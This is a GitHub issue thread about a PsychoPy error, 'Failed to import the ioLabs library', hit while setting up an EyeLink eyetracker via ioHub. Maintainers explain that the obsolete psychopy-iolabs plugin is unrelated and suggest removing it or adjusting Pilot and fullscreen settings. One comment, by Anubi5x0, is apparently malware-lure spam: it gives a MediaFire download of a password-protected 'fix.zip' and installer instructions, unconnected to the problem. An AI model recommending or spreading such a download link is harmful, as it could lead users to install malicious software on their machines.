### ISSUE TITLE
[Bug]: Failure to import iolabs

### ISSUE THREAD

**Issue by aky9** [psychopy/psychopy#6815]
### PsychoPy Version

2024.2.1

### What OS are your PsychoPy running on?

Windows 11

### Bug Description

I am attempting to connect an SR eye-tracker via the ioHub launchHubserver, however, it keeps reporting that it "failed to import ioLabs library." I tried adding the package directly to the PsychoPy directory to no avail. 

**Here is the import statement I have tried**
`from psychopy.iohub.client import launchHubServer
`
**Another variation I have tried**
```
import psychopy.iohub as io
ioServer = io.launchHubServer(window=win, experiment_code='Forced CSAB mixed', session_code=ioSession, datastore_name=filename, **ioConfig)

```

**Here is the error:**

```
`pygame 2.1.0 (SDL 2.0.16, Python 3.8.10)
Hello from the pygame community. https://www.pygame.org/contribute.html
7.1476     ERROR     Failed to import the ioLabs library. If you're using your own
Traceback (most recent call last):
copy of python (not the Standalone distribution of PsychoPy) then
try installing it with:
   > pip install ioLabs
7.1477     ERROR     Plugin `psychopy-iolabs` entry point requires module `psychopy_iolabs`, but an error occurred while loading it.`

```
### Expected Behaviour

Past versions of PsychoPy allowed me to use the second example import statement to set up the eye-tracker. 

### Steps to Reproduce

1. Have PsychoPy 24.2.1 installed
2. Set up SR Eyetracker (EYE LINK REMOTE 1000) with the main and host PC (this step might even be unnecessary)
3. Try running the import statement on the latest version of PsychoPy

### Additional context

I have also tried running experiments that do not have an eye-tracking component, and am encountering the same issue. It seems there is a general issue with the ioLab framework. For example, for an experiment that only uses keyboard input, this error is being reported:

```
5.7254     ERROR     Failed to import the ioLabs library. If you're using your own
copy of python (not the Standalone distribution of PsychoPy) then
try installing it with:
   > pip install ioLabs
5.7256     ERROR     Plugin `psychopy-iolabs` entry point requires module `psychopy_iolabs`, but an error occurred while loading it.
```

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TEParsons** [comment]
`psychopy-iolabs` isn't related to eyetracking or to ioHub (despite their similar names), it's the plugin for using button boxes made by the company ioLabs: https://github.com/psychopy/psychopy-iolabs

I know @mh105 has recently put in some fixes to the [eyelink plugin](https://github.com/psychopy/psychopy-eyetracker-sr-research) so it may just be a case of needing to update? If you uninstall and reinstall (via either `pip` or the plugin manager in Builder) that will give you the latest version of the plugin.

**Comment by mh105** [comment]
Yeah looks like you have the `psychopy-iolabs` plugin installed but it's having trouble importing. This is not related to SR-Research plugin at [`psychopy-eyetracker-sr-research`](https://github.com/psychopy/psychopy-eyetracker-sr-research).

You also don't want to manually add the package to the Standalone distribution PsychoPy directory. You should try use the Plugins & Packages manager in the PsychoPy builder to double check if you have `psychopy-iolabs` installed. If so, you want to remove it.

Just to be clear: nothing in ioHub/eyelink-related code tries to import ioLabs - they don't even make a reference to it. The error you are seeing is arising from the step where PsychoPy tries to organize all the plugins installed on your computer, which happens before any ioHub/eyelink-related code.

[`iolabs` is no longer supported by PsychoPy](https://psychopy.org/api/hardware/iolab.html), so it makes sense that the `psychopy-iolabs` repo isn't updated for the latest switch to using entry-points to discover plugins. All you need to do is to remove this obsolete `psychopy-iolabs` plugin, and the EyeLink will work correctly through `ioHub`.

**Comment by aky9** [comment]
Thank you for your response. Seemingly, switching the task from Pilot to Run fixed the issue. Any guess as to why?

**Comment by mh105** [comment]
Somehow running in Pilot mode is trying to import iolab, which does not replicate for me. I think you want to check if you have iolab plugin installed somewhere and delete that.

**Comment by TEParsons** [comment]
What's probably happening is that the eyelink procedure can't run in windowed mode, but pilot mode forces the window to windowed mode. If you want the benefits of pilot mode without this, you can always set "Force fullscreen" to False in your prefs and then eyelink will work in both modes. I think importing iolabs is incidental, it probably doesn't affect the actual bug you're seeing.
